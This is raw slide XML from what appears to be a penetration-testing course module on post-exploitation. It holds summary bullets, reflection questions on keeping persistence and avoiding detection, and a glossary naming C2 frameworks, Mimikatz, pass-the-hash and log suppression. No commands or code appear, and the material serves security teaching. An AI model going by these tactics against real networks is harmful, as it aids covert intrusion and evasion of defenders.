            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Legitimate Windows utilities, such as PowerShell, WMI, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> are used for post-exploitation activities, a practice often referred to as "living-off-the-land.".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerShell can be used for a range of tasks from getting directory listings to administrative tasks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The PowerShell-based post-exploitation frameworks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and Empire can be used for activities like keylogging, bind shells, reverse shells, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, and more. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Summary</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="569344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>What Did I Learn in this Module?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3337" y="846980"/>
            <a:ext cx="8816145"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1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Another tool is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, a JavaScript web application that reveals hidden relationships in a Windows Active Directory environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WMI can be exploited by attackers to manage data and operations on Windows operating systems. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, a suite of command-line tools, reveals running processes and control Windows-based computers from a remote terminal.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> provides another way for attackers to connect to Windows systems and maintain persistent access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege escalation is where a user gains additional privileges beyond those intended by the developer, either vertically (accessing higher-privileged functions) or horizontally (accessing functions or content reserved for other users).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Covering your tracks after a penetration testing engagement is important, along with methods such as suppressing logs, deleting user accounts and files, and removing any backdoors or services installed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Steganography is a technique for hiding messages inside other content is a method for obfuscation, evasion, and track covering.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11594701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Performing Post-Exploitation Techniques Summary</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="320400"/>
            <a:ext cx="9144000" cy="365766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Reflection Questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E9D2EEE-39FF-901E-B51E-3B5A0EC61268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-674" y="917904"/>
            <a:ext cx="8743342"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You have exploited a vulnerability and gained access to devices on the network. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="140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So now what? </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="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Gaining access is just part of an attack. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="140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Why is merely gaining access during a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> not enough? </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="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Persistence in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> means gaining access and maintaining a presence in the network that can be used in various ways. </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="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What are some of the things that pen testers (and threat actors) do while they have prolonged access to a network?</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="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In order to maintain persistent access, it is necessary to avoid detection. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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If network security personnel become aware of your presence and activities, they will take measures to not only deny you access, but to also determine and mitigate the vulnerabilities and exploits that allowed you access. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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This will make it much more difficult to regain access in the future. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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What sort of activities could alert security personnel to your presence? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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What can you do to make detection of your activities more difficult while you continue to exploit the network?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2055569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name="Slide 93">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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="734423"/>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Terms and Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278296" y="1282984"/>
            <a:ext cx="8229600" cy="3136616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="140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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{409DE0C5-815C-583B-1D3A-2E7750D9F924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="225750996"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="107830" y="808726"/>
          <a:ext cx="8889897" cy="4231726"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4231821">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3052572171"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4658076">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2496594625"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4231726">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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Shell</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR"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Bash</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ksh</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>tcsh</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Windows PowerShell</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bind shell</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reverse shell</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Meterpreter module</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Netcat</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> commands (see table in 8.1.2)</a:t>
                      </a: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Metasploit framework</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Meterpreter commands (see table in 8.1.2)</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Command and Control (C2) systems</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covert channel</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>socat</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wsc2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>WMImplant</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DropboxC2 (DBC2)</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TrevorC2</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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Twittor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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DNSCat2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Websocket</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="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User Account Control (UAC)</a:t>
                      </a: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Task Scheduler</a:t>
                      </a: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Daemon</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="120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Backdoor</a:t>
                      </a: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lateral movement</a:t>
                      </a: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data exfiltration</a:t>
                      </a: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Pivoting</a:t>
                      </a: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sensitive data</a:t>
                      </a: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Pass-the-hash</a:t>
                      </a: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network segmentation</a:t>
                      </a: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Microsoft´s Remote Desktop Protocol (RDP)</a:t>
                      </a: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Apple Remote Desktop</a:t>
                      </a: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VNC</a:t>
                      </a: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X server forwarding</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Sysinternals</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="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living-off-the-land</a:t>
                      </a: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fileless malware</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914353655"/>
                  </a:ext>
                </a:extLst>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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="734423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Terms and Commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{409DE0C5-815C-583B-1D3A-2E7750D9F924}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3340249981"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="107830" y="808726"/>
          <a:ext cx="4231821" cy="3182710"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4231821">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3052572171"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3182710">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" defTabSz="914400">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
